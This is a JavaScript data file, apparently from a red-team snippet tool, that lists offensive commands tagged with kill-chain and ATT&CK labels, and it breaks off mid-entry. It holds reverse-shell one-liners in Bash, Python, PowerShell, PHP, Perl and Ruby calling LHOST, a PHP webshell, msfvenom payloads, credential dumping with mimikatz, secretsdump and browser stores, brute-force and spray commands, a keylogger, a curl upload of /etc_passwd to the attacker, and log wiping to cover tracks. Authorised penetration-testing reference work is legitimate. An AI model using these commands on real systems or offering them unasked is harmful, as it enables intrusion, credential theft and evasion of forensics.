const SNIPPETS_RED_1 = [
{ id: 'nmap-basic', title: 'Nmap TCP Fast Scan', team: 'red', category: 'recon',
      description: 'Quick full-port scan with default scripts and version detection.',
      tags: ['nmap', 'ports'], command: 'nmap -p- --min-rate 1000 -sC -sV TARGET',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'artifacts', owasp: [] },
{ id: 'nmap-udp', title: 'Nmap Top UDP', team: 'red', category: 'recon',
      description: 'Probe common UDP services.',
      tags: ['nmap', 'udp'], command: 'nmap -sU --top-ports 200 TARGET',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'artifacts', owasp: [] },
{ id: 'nmap-vuln', title: 'Nmap Vuln Scripts', team: 'red', category: 'recon',
      description: 'Run Nmap vulnerability scanning scripts.',
      tags: ['nmap', 'vuln'], command: 'nmap --script vuln TARGET',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: ['A06'] },
{ id: 'whatweb', title: 'WhatWeb Fingerprint', team: 'red', category: 'recon',
      description: 'Identify web technologies and frameworks.',
      tags: ['whatweb', 'fingerprint'], command: 'whatweb -a 3 http://TARGET',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'artifacts', owasp: [] },
{ id: 'amass-enum', title: 'Amass Subdomain Enum', team: 'red', category: 'recon',
      description: 'Passive + active subdomain enumeration.',
      tags: ['amass', 'subdomain', 'osint'], command: 'amass enum -d DOMAIN -passive -o amass_results.txt',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'subfinder', title: 'Subfinder Subdomains', team: 'red', category: 'recon',
      description: 'Fast passive subdomain discovery.',
      tags: ['subfinder', 'subdomain'], command: 'subfinder -d DOMAIN -all -o subdomains.txt',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'theHarvester', title: 'theHarvester OSINT', team: 'red', category: 'recon',
      description: 'Gather emails, names, subdomains from public sources.',
      tags: ['theharvester', 'osint', 'emails'], command: 'theHarvester -d DOMAIN -b all -l 200 -f harvest_results',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'shodan-host', title: 'Shodan Host Lookup', team: 'red', category: 'recon',
      description: 'Query Shodan for open ports and services on a host.',
      tags: ['shodan', 'osint'], command: 'shodan host TARGET',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'ips', owasp: [] },
{ id: 'nuclei-scan', title: 'Nuclei Vulnerability Scan', team: 'red', category: 'recon',
      description: 'Template-based vulnerability scanner.',
      tags: ['nuclei', 'vuln'], command: 'nuclei -u http://TARGET -t cves/ -t exposures/ -t misconfigurations/ -o nuclei_results.txt',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: ['A05', 'A06'] },
{ id: 'ffuf-dir', title: 'Directory Fuzzing (ffuf)', team: 'red', category: 'web',
      description: 'Enumerate common web paths.',
      tags: ['ffuf', 'fuzz'], command: 'ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401,403',
      killchain: 'recon', attack: ['reconnaissance', 'initial-access'], pyramid: 'tools', owasp: ['A01'] },
{ id: 'ffuf-vhost', title: 'Virtual Host Fuzzing', team: 'red', category: 'web',
      description: 'Find vhosts behind a single IP.',
      tags: ['ffuf', 'vhost'], command: 'ffuf -u http://TARGET/ -H "Host: FUZZ.DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'domains', owasp: [] },
{ id: 'gobuster-dir', title: 'Gobuster Dir', team: 'red', category: 'web',
      description: 'Alternative content discovery.',
      tags: ['gobuster'], command: 'gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -t 40 -x php,txt,html',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: ['A01'] },
{ id: 'feroxbuster', title: 'Feroxbuster Recursive', team: 'red', category: 'web',
      description: 'Fast recursive content discovery.',
      tags: ['feroxbuster', 'fuzz'], command: 'feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt -t 50',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: ['A01'] },
{ id: 'nikto', title: 'Nikto Web Scan', team: 'red', category: 'web',
      description: 'Quick web server misconfiguration scan.',
      tags: ['nikto', 'audit'], command: 'nikto -h http://TARGET',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: ['A05'] },
{ id: 'sqlmap-basic', title: 'SQLMap Basic', team: 'red', category: 'web',
      description: 'Test a parameter for SQL injection.',
      tags: ['sqlmap', 'sqli'], command: 'sqlmap -u "http://TARGET/item.php?id=1" --batch --risk=2 --level=3',
      killchain: 'exploitation', attack: ['initial-access', 'execution'], pyramid: 'ttps', owasp: ['A03'] },
{ id: 'sqlmap-dump', title: 'SQLMap Dump DB', team: 'red', category: 'web',
      description: 'Dump entire database after confirming SQLi.',
      tags: ['sqlmap', 'sqli', 'dump'], command: 'sqlmap -u "http://TARGET/item.php?id=1" --batch --dump-all --output-dir=./sqldump',
      killchain: 'actions', attack: ['collection', 'exfiltration'], pyramid: 'ttps', owasp: ['A03'] },
{ id: 'lfi-basic', title: 'LFI Test', team: 'red', category: 'web',
      description: 'Test for local file inclusion with traversal.',
      tags: ['lfi', 'traversal'], command: 'curl -s "http://TARGET/page.php?file=../../../../etc_passwd"',
      killchain: 'exploitation', attack: ['initial-access'], pyramid: 'ttps', owasp: ['A01', 'A03'] },
{ id: 'lfi-filter', title: 'LFI PHP Filter (Base64)', team: 'red', category: 'web',
      description: 'Read PHP source via base64 filter wrapper.',
      tags: ['lfi', 'php'], command: 'curl -s "http://TARGET/page.php?file=php://filter/convert.base64-encode/resource=index.php" | base64 -d',
      killchain: 'exploitation', attack: ['collection'], pyramid: 'ttps', owasp: ['A03'] },
{ id: 'wfuzz-param', title: 'Wfuzz Parameter Discovery', team: 'red', category: 'web',
      description: 'Discover hidden GET parameters.',
      tags: ['wfuzz', 'params'], command: 'wfuzz -u "http://TARGET/page.php?FUZZ=test" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh 0',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: [] },
{ id: 'xss-test', title: 'XSS Probe', team: 'red', category: 'web',
      description: 'Test reflected XSS on parameters.',
      tags: ['xss', 'web'], command: 'curl -s "http://TARGET/search?q=<script>alert(1)</script>" | grep -i "alert"',
      killchain: 'exploitation', attack: ['initial-access'], pyramid: 'ttps', owasp: ['A03'] },
{ id: 'ssrf-test', title: 'SSRF Test', team: 'red', category: 'web',
      description: 'Test for server-side request forgery.',
      tags: ['ssrf', 'web'], command: 'curl -s "http://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/"',
      killchain: 'exploitation', attack: ['initial-access'], pyramid: 'ttps', owasp: ['A10'] },
{ id: 'wpscan', title: 'WPScan WordPress', team: 'red', category: 'web',
      description: 'WordPress vulnerability scanner.',
      tags: ['wpscan', 'wordpress', 'cms'], command: 'wpscan --url http://TARGET --enumerate vp,vt,u --plugins-detection aggressive',
      killchain: 'recon', attack: ['reconnaissance'], pyramid: 'tools', owasp: ['A06'] },
{ id: 'hydra-ssh', title: 'Hydra SSH Brute', team: 'red', category: 'passwords',
      description: 'Brute-force SSH login with wordlists.',
      tags: ['hydra', 'ssh', 'brute-force'], command: 'hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://TARGET -t 4',
      killchain: 'exploitation', attack: ['credential-access', 'initial-access'], pyramid: 'ttps', owasp: ['A07'] },
{ id: 'hydra-http-post', title: 'Hydra HTTP POST Login', team: 'red', category: 'passwords',
      description: 'Brute-force web login form.',
      tags: ['hydra', 'http', 'brute-force'], command: 'hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:username=^USER^&password=^PASS^:Invalid"',
      killchain: 'exploitation', attack: ['credential-access', 'initial-access'], pyramid: 'ttps', owasp: ['A07'] },
{ id: 'hashcat-ntlm', title: 'Hashcat NTLM', team: 'red', category: 'passwords',
      description: 'Crack NTLM hashes with hashcat.',
      tags: ['hashcat', 'ntlm', 'cracking'], command: 'hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --force',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'hashes', owasp: ['A02'] },
{ id: 'john-shadow', title: 'John the Ripper (shadow)', team: 'red', category: 'passwords',
      description: 'Crack Linux shadow file hashes.',
      tags: ['john', 'shadow', 'cracking'], command: 'unshadow /etc_passwd /etc/shadow > combined.txt && john combined.txt --wordlist=/usr/share/wordlists/rockyou.txt',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'hashes', owasp: ['A02'] },
{ id: 'crackmapexec-smb', title: 'CrackMapExec SMB', team: 'red', category: 'passwords',
      description: 'Password spray or validate creds against SMB.',
      tags: ['crackmapexec', 'smb', 'spray'], command: 'crackmapexec smb TARGET -u users.txt -p passwords.txt --continue-on-success',
      killchain: 'exploitation', attack: ['credential-access', 'lateral-movement'], pyramid: 'tools', owasp: ['A07'] },
{ id: 'hashcat-rules', title: 'Hashcat with Rules', team: 'red', category: 'passwords',
      description: 'Rule-based password cracking for complex passwords.',
      tags: ['hashcat', 'rules', 'cracking'], command: 'hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'hashes', owasp: ['A02'] },
{ id: 'spray-kerbrute', title: 'Kerberos Password Spray', team: 'red', category: 'passwords',
      description: 'Password spray AD accounts via Kerberos (stealthy, no lockout at 1/min).',
      tags: ['kerbrute', 'spray', 'kerberos', 'ad'], command: 'kerbrute passwordspray -d DOMAIN --dc DC_IP users.txt "Season2024!"',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: ['A07'] },
{ id: 'hashcat-combinator', title: 'Hashcat Combinator', team: 'red', category: 'passwords',
      description: 'Combine two wordlists for password cracking.',
      tags: ['hashcat', 'combinator', 'cracking'], command: 'hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'hashes', owasp: ['A02'] },
{ id: 'cewl-wordlist', title: 'CeWL Custom Wordlist', team: 'red', category: 'passwords',
      description: 'Generate custom wordlist by spidering target website.',
      tags: ['cewl', 'wordlist', 'spider'], command: 'cewl https://TARGET -d 3 -m 6 -w wordlist.txt --with-numbers\n# Add common mutations:\njohn --wordlist=wordlist.txt --rules --stdout > mutated.txt',
      killchain: 'recon', attack: ['credential-access'], pyramid: 'domains', owasp: ['A07'] },
{ id: 'ntlmrelayx', title: 'NTLMRelayx', team: 'red', category: 'passwords',
      description: 'Relay captured NTLM authentication to other services.',
      tags: ['ntlm', 'relay', 'impacket'], command: 'ntlmrelayx.py -t smb://TARGET -smb2support\n# With SOCKS proxy:\nntlmrelayx.py -tf targets.txt -smb2support -socks',
      killchain: 'exploitation', attack: ['credential-access', 'lateral-movement'], pyramid: 'ttps', owasp: ['A07'] },
{ id: 'secretsdump', title: 'Secretsdump (Impacket)', team: 'red', category: 'passwords',
      description: 'Dump SAM, LSA secrets, and cached creds remotely.',
      tags: ['impacket', 'secretsdump', 'ntlm'], command: 'secretsdump.py DOMAIN/user:password@TARGET\n# With NTLM hash:\nsecretsdump.py -hashes :NTHASH DOMAIN/user@TARGET',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'hashes', owasp: ['A02'] },
{ id: 'bloodhound-collect', title: 'BloodHound Collection', team: 'red', category: 'ad',
      description: 'Collect AD data with bloodhound-python.',
      tags: ['bloodhound', 'ad', 'enum'], command: 'bloodhound-python -d DOMAIN -u USER -p PASS -c All -ns TARGET',
      killchain: 'recon', attack: ['discovery', 'reconnaissance'], pyramid: 'tools', owasp: [] },
{ id: 'impacket-secretsdump', title: 'Impacket secretsdump', team: 'red', category: 'ad',
      description: 'Dump SAM/LSA/NTDS secrets remotely.',
      tags: ['impacket', 'secretsdump', 'dump'], command: 'impacket-secretsdump DOMAIN/USER:PASS@TARGET',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'tools', owasp: [] },
{ id: 'impacket-psexec', title: 'Impacket PsExec', team: 'red', category: 'ad',
      description: 'Remote shell via PsExec-like SMB execution.',
      tags: ['impacket', 'psexec', 'lateral'], command: 'impacket-psexec DOMAIN/USER:PASS@TARGET',
      killchain: 'actions', attack: ['lateral-movement', 'execution'], pyramid: 'tools', owasp: [] },
{ id: 'impacket-wmiexec', title: 'Impacket WMI Exec', team: 'red', category: 'ad',
      description: 'Remote shell via WMI.',
      tags: ['impacket', 'wmiexec', 'lateral'], command: 'impacket-wmiexec DOMAIN/USER:PASS@TARGET',
      killchain: 'actions', attack: ['lateral-movement', 'execution'], pyramid: 'tools', owasp: [] },
{ id: 'evil-winrm', title: 'Evil-WinRM', team: 'red', category: 'ad',
      description: 'WinRM shell with file upload/download.',
      tags: ['evil-winrm', 'winrm'], command: 'evil-winrm -i TARGET -u USER -p PASS',
      killchain: 'actions', attack: ['lateral-movement', 'execution'], pyramid: 'tools', owasp: [] },
{ id: 'kerbrute-userenum', title: 'Kerbrute User Enum', team: 'red', category: 'ad',
      description: 'Enumerate valid AD users via Kerberos pre-auth.',
      tags: ['kerbrute', 'kerberos', 'enum'], command: 'kerbrute userenum -d DOMAIN --dc TARGET users.txt',
      killchain: 'recon', attack: ['reconnaissance', 'credential-access'], pyramid: 'ttps', owasp: [] },
{ id: 'getnpusers', title: 'AS-REP Roasting', team: 'red', category: 'ad',
      description: 'Get TGTs for accounts without pre-auth.',
      tags: ['impacket', 'asreproast', 'kerberos'], command: 'impacket-GetNPUsers DOMAIN/ -usersfile users.txt -no-pass -dc-ip TARGET -format hashcat -outputfile asrep.txt',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: [] },
{ id: 'getuserspns', title: 'Kerberoasting', team: 'red', category: 'ad',
      description: 'Request service tickets for offline cracking.',
      tags: ['impacket', 'kerberoast', 'kerberos'], command: 'impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip TARGET -request -outputfile kerberoast.txt',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: [] },
{ id: 'enum4linux', title: 'Enum4Linux-ng', team: 'red', category: 'ad',
      description: 'Enumerate SMB/RPC shares, users, groups.',
      tags: ['enum4linux', 'smb', 'enum'], command: 'enum4linux-ng -A TARGET',
      killchain: 'recon', attack: ['discovery'], pyramid: 'tools', owasp: [] },
{ id: 'ldapsearch', title: 'LDAP Search', team: 'red', category: 'ad',
      description: 'Query LDAP directory for users and objects.',
      tags: ['ldap', 'enum'], command: 'ldapsearch -x -H ldap://TARGET -D "DOMAIN\\USER" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName',
      killchain: 'recon', attack: ['discovery'], pyramid: 'artifacts', owasp: [] },
{ id: 'responder', title: 'Responder (LLMNR/NBT-NS)', team: 'red', category: 'ad',
      description: 'Capture NTLMv2 hashes on the local network.',
      tags: ['responder', 'llmnr', 'ntlm'], command: 'responder -I eth0 -dwP',
      killchain: 'exploitation', attack: ['credential-access'], pyramid: 'ttps', owasp: [] },
{ id: 'mimikatz-logonpasswords', title: 'Mimikatz Logon Passwords', team: 'red', category: 'ad',
      description: 'Dump plaintext credentials from memory.',
      tags: ['mimikatz', 'credentials'], command: 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'tools', owasp: [] },
{ id: 'pth-evil-winrm', title: 'Pass-the-Hash', team: 'red', category: 'ad',
      description: 'Authenticate with NTLM hash instead of password.',
      tags: ['evil-winrm', 'pth', 'lateral'], command: 'evil-winrm -i TARGET -u Administrator -H NTHASH',
      killchain: 'actions', attack: ['lateral-movement'], pyramid: 'ttps', owasp: [] },
{ id: 'python-rev', title: 'Python Reverse Shell', team: 'red', category: 'shells',
      description: 'Python one-liner reverse shell.',
      tags: ['reverse-shell', 'python'], command: 'python3 -c \'import os,pty,socket;s=socket.socket();s.connect(("LHOST",LPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")\'',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'ttps', owasp: [] },
{ id: 'bash-rev', title: 'Bash Reverse Shell', team: 'red', category: 'shells',
      description: 'Bash TCP reverse shell.',
      tags: ['reverse-shell', 'bash'], command: 'bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'ttps', owasp: [] },
{ id: 'nc-rev', title: 'Netcat Reverse Shell', team: 'red', category: 'shells',
      description: 'nc reverse shell with mkfifo fallback.',
      tags: ['reverse-shell', 'nc'], command: 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT > /tmp/f',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'artifacts', owasp: [] },
{ id: 'powershell-rev', title: 'PowerShell Reverse Shell', team: 'red', category: 'shells',
      description: 'Windows PowerShell reverse shell.',
      tags: ['reverse-shell', 'powershell'], command: '$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'artifacts', owasp: [] },
{ id: 'php-rev', title: 'PHP Reverse Shell', team: 'red', category: 'shells',
      description: 'PHP reverse shell one-liner for web servers.',
      tags: ['reverse-shell', 'php', 'web'], command: 'php -r \'$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");\'',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'artifacts', owasp: ['A03'] },
{ id: 'ruby-rev', title: 'Ruby Reverse Shell', team: 'red', category: 'shells',
      description: 'Ruby reverse shell one-liner.',
      tags: ['reverse-shell', 'ruby'], command: 'ruby -rsocket -e\'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'artifacts', owasp: [] },
{ id: 'perl-rev', title: 'Perl Reverse Shell', team: 'red', category: 'shells',
      description: 'Perl reverse shell one-liner.',
      tags: ['reverse-shell', 'perl'], command: 'perl -e \'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'',
      killchain: 'exploitation', attack: ['execution'], pyramid: 'artifacts', owasp: [] },
{ id: 'php-webshell', title: 'PHP Command Webshell', team: 'red', category: 'shells',
      description: 'Minimal PHP webshell for command execution. Use ?cmd=whoami',
      tags: ['webshell', 'php', 'web'], command: 'echo \'<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);}?>\' > shell.php',
      killchain: 'exploitation', attack: ['execution', 'persistence'], pyramid: 'artifacts', owasp: ['A03'] },
{ id: 'socat-encrypted', title: 'Socat Encrypted Shell', team: 'red', category: 'shells',
      description: 'Encrypted reverse shell using socat with TLS.',
      tags: ['socat', 'encrypted', 'reverse-shell'], command: '# Attacker: socat OPENSSL-LISTEN:LPORT,cert=cert.pem,verify=0 FILE:`tty`,raw,echo=0\n# Target: socat OPENSSL:LHOST:LPORT,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane',
      killchain: 'exploitation', attack: ['execution', 'command-control'], pyramid: 'ttps', owasp: [] },
{ id: 'tty-upgrade', title: 'TTY Upgrade', team: 'red', category: 'post',
      description: 'Upgrade dumb shell to interactive TTY.',
      tags: ['tty', 'post-exploitation'], command: 'python3 -c \'import pty; pty.spawn("/bin/bash")\'\nCtrl+Z\nstty raw -echo; fg\nexport TERM=xterm-256color',
      killchain: 'installation', attack: ['execution'], pyramid: 'ttps', owasp: [] },
{ id: 'post-screenshot', title: 'Screenshot Capture', team: 'red', category: 'post',
      description: 'Capture desktop screenshot on compromised host.',
      tags: ['screenshot', 'post-exploitation'],
      commands: {
        linux: 'DISPLAY=:0 import -window root /tmp/screen.png',
        windows: 'Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::PrimaryScreen | ForEach-Object { $bmp = New-Object Drawing.Bitmap($_.Bounds.Width, $_.Bounds.Height); $g = [Drawing.Graphics]::FromImage($bmp); $g.CopyFromScreen($_.Bounds.Location, [Drawing.Point]::Empty, $_.Bounds.Size); $bmp.Save("C:\\temp\\screen.png") }',
        macos: 'screencapture /tmp/screen.png',
      },
      command: '# Linux: import -window root /tmp/screen.png\n# Windows: PowerShell screenshot capture\n# macOS: screencapture /tmp/screen.png',
      killchain: 'actions', attack: ['collection'], pyramid: 'ttps', owasp: [] },
{ id: 'post-keylog', title: 'Keylogger Deploy', team: 'red', category: 'post',
      description: 'Deploy a basic keylogger. Linux uses script, Windows uses PowerShell.',
      tags: ['keylogger', 'post-exploitation'], command: '# Linux: script -q /tmp/.keylog\n# Windows (PowerShell):\n$path="C:\\temp\\keys.log";Add-Type -AssemblyName System.Windows.Forms;while($true){Start-Sleep -Milliseconds 40;$k=[System.Windows.Forms.Control]::IsKeyLocked;Add-Content $path (Get-Date)}',
      killchain: 'actions', attack: ['collection', 'credential-access'], pyramid: 'ttps', owasp: [] },
{ id: 'post-dump-browser', title: 'Browser Credential Dump', team: 'red', category: 'post',
      description: 'Extract saved credentials from browsers.',
      tags: ['browser', 'credentials', 'post-exploitation'], command: '# Linux (Firefox):\nfind / -name "logins.json" -o -name "key4.db" 2>/dev/null\n# Windows (Chrome) — LaZagne:\nlazagne.exe browsers -oJ\n# Or SharpChrome:\nSharpChrome.exe logins',
      killchain: 'actions', attack: ['credential-access'], pyramid: 'ttps', owasp: ['A02'] },
{ id: 'post-port-fwd', title: 'Local Port Forward', team: 'red', category: 'post',
      description: 'Forward internal port to attacker machine after initial access.',
      tags: ['port-forward', 'pivot', 'post-exploitation'], command: '# SSH local port forward:\nssh -L 8080:INTERNAL_HOST:80 user@PIVOT_HOST\n# Socat:\nsocat TCP-LISTEN:8080,fork TCP:INTERNAL_HOST:80',
      killchain: 'actions', attack: ['command-control', 'lateral-movement'], pyramid: 'ttps', owasp: [] },
{ id: 'post-data-staging', title: 'Data Staging', team: 'red', category: 'post',
      description: 'Stage and compress data before exfiltration.',
      tags: ['exfil', 'staging', 'post-exploitation'], command: '# Linux:\ntar czf /tmp/.data.tar.gz /home /var/www /etc/shadow 2>/dev/null\n# Windows:\nCompress-Archive -Path C:\\Users -DestinationPath C:\\temp\\data.zip',
      killchain: 'actions', attack: ['collection', 'exfiltration'], pyramid: 'artifacts', owasp: [] },
{ id: 'post-history-clear', title: 'Cover Tracks', team: 'red', category: 'post',
      description: 'Clear command history and logs to cover tracks.',
      tags: ['anti-forensics', 'post-exploitation'], command: '# Linux:\nhistory -c && history -w\necho > ~/.bash_history\nrm -f /var/log/auth.log /var/log/syslog\n# Windows:\nClear-EventLog -LogName Security,System,Application\nRemove-Item (Get-PSReadlineOption).HistorySavePath',
      killchain: 'actions', attack: ['defense-evasion'], pyramid: 'ttps', owasp: [] },
{ id: 'post-pivot-scan', title: 'Internal Pivot Scan', team: 'red', category: 'post',
      description: 'Scan internal network from compromised host (no tools).',
      tags: ['pivot', 'scan', 'post-exploitation'], command: '# Bash ping sweep:\nfor i in $(seq 1 254); do (ping -c1 -W1 192.168.1.$i 2>/dev/null | grep "bytes from" &); done\n# Port scan (bash):\nfor port in 22 80 443 445 3389 8080; do (echo >/dev/tcp/TARGET/$port) 2>/dev/null && echo "$port open"; done',
      killchain: 'actions', attack: ['discovery', 'lateral-movement'], pyramid: 'ttps', owasp: [] },
{ id: 'msfvenom-linux', title: 'Msfvenom Linux ELF', team: 'red', category: 'payloads',
      description: 'Generate a staged Linux Meterpreter binary.',
      tags: ['msfvenom', 'linux', 'meterpreter'], command: 'msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=LHOST LPORT=LPORT -f elf -o shell.elf',
      killchain: 'weaponize', attack: ['resource-development'], pyramid: 'tools', owasp: [] },
{ id: 'msfvenom-windows', title: 'Msfvenom Windows EXE', team: 'red', category: 'payloads',
      description: 'Generate a staged Windows Meterpreter EXE.',
      tags: ['msfvenom', 'windows', 'meterpreter'], command: 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=LHOST LPORT=LPORT -f exe -o shell.exe',
      killchain: 'weaponize', attack: ['resource-development'], pyramid: 'tools', owasp: [] },
{ id: 'msfvenom-aspx', title: 'Msfvenom ASPX', team: 'red', category: 'payloads',
      description: 'Generate an ASPX webshell for IIS.',
      tags: ['msfvenom', 'aspx', 'webshell'], command: 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=LHOST LPORT=LPORT -f aspx -o shell.aspx',
      killchain: 'weaponize', attack: ['resource-development'], pyramid: 'tools', owasp: [] },
{ id: 'msfvenom-php', title: 'Msfvenom PHP', team: 'red', category: 'payloads',
      description: 'Generate a PHP reverse shell payload.',
      tags: ['msfvenom', 'php', 'webshell'], command: 'msfvenom -p php/meterpreter/reverse_tcp LHOST=LHOST LPORT=LPORT -f raw -o shell.php',
      killchain: 'weaponize', attack: ['resource-development'], pyramid: 'tools', owasp: [] },
{ id: 'listener-nc', title: 'Netcat Listener', team: 'red', category: 'payloads',
      description: 'Start a netcat catch-all listener.',
      tags: ['nc', 'listener'], command: 'nc -lvnp LPORT',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'listener-rlwrap', title: 'Rlwrap Listener', team: 'red', category: 'payloads',
      description: 'Listener with readline support for arrow keys.',
      tags: ['rlwrap', 'nc', 'listener'], command: 'rlwrap nc -lvnp LPORT',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'listener-multi-handler', title: 'Metasploit Handler', team: 'red', category: 'payloads',
      description: 'MSF multi-handler for staged payloads.',
      tags: ['metasploit', 'handler'], command: 'msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST LHOST; set LPORT LPORT; exploit"',
      killchain: 'c2', attack: ['command-control'], pyramid: 'tools', owasp: [] },
{ id: 'http-upload-server', title: 'HTTP Upload Server', team: 'red', category: 'receivers',
      description: 'Python HTTP server that accepts file uploads (PUT + POST multipart).',
      tags: ['python', 'http-server', 'upload', 'receiver'], command: 'python3 -c "\nimport http.server, os\nclass H(http.server.SimpleHTTPRequestHandler):\n  def do_PUT(self):\n    path = self.translate_path(self.path)\n    length = int(self.headers[\'Content-Length\'])\n    with open(path, \'wb\') as f: f.write(self.rfile.read(length))\n    self.send_response(201); self.end_headers()\n  do_POST = do_PUT\nhttp.server.HTTPServer((\'0.0.0.0\', 8000), H).serve_forever()\n"\n# Upload from target: curl -X PUT http://LHOST:8000/loot.txt -d @/etc_passwd',
      killchain: 'c2', attack: ['command-control', 'exfiltration'], pyramid: 'ips', owasp: [] },
{ id: 'https-server', title: 'HTTPS Server (self-signed)', team: 'red', category: 'receivers',
      description: 'Quick HTTPS server with self-signed cert for encrypted delivery.',
      tags: ['python', 'https', 'ssl', 'receiver'], command: '# Generate cert:\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 1 -nodes -subj "/CN=LHOST"\n# Serve:\npython3 -c "\nimport http.server, ssl\nctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\nctx.load_cert_chain(\'cert.pem\', \'key.pem\')\nwith http.server.HTTPServer((\'0.0.0.0\', 443), http.server.SimpleHTTPRequestHandler) as srv:\n  srv.socket = ctx.wrap_socket(srv.socket, server_side=True)\n  srv.serve_forever()\n"',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'php-server', title: 'PHP Dev Server', team: 'red', category: 'receivers',
      description: 'Built-in PHP server — great for testing PHP shells and webshells.',
      tags: ['php', 'http-server', 'receiver'], command: 'php -S 0.0.0.0:8080 -t .',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'ruby-http-server', title: 'Ruby HTTP Server', team: 'red', category: 'receivers',
      description: 'One-liner Ruby HTTP file server.',
      tags: ['ruby', 'http-server', 'receiver'], command: 'ruby -run -e httpd -- -p 8000 .',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'updog', title: 'Updog Upload Server', team: 'red', category: 'receivers',
      description: 'HTTP/HTTPS file server with upload support and auth.',
      tags: ['updog', 'http-server', 'upload', 'receiver'], command: 'updog -p 8000\n# With SSL and password:\nupdog -p 443 --ssl --password s3cr3t',
      killchain: 'c2', attack: ['command-control', 'exfiltration'], pyramid: 'tools', owasp: [] },
{ id: 'ftp-server', title: 'FTP Server (pyftpdlib)', team: 'red', category: 'receivers',
      description: 'Quick anonymous FTP server for file transfer.',
      tags: ['python', 'ftp', 'receiver'], command: 'python3 -m pyftpdlib -p 21 -w\n# With auth:\npython3 -m pyftpdlib -p 21 -u admin -P pass -w',
      killchain: 'c2', attack: ['command-control'], pyramid: 'ips', owasp: [] },
{ id: 'webdav-server', title: 'WebDAV Server', team: 'red', category: 'receivers',
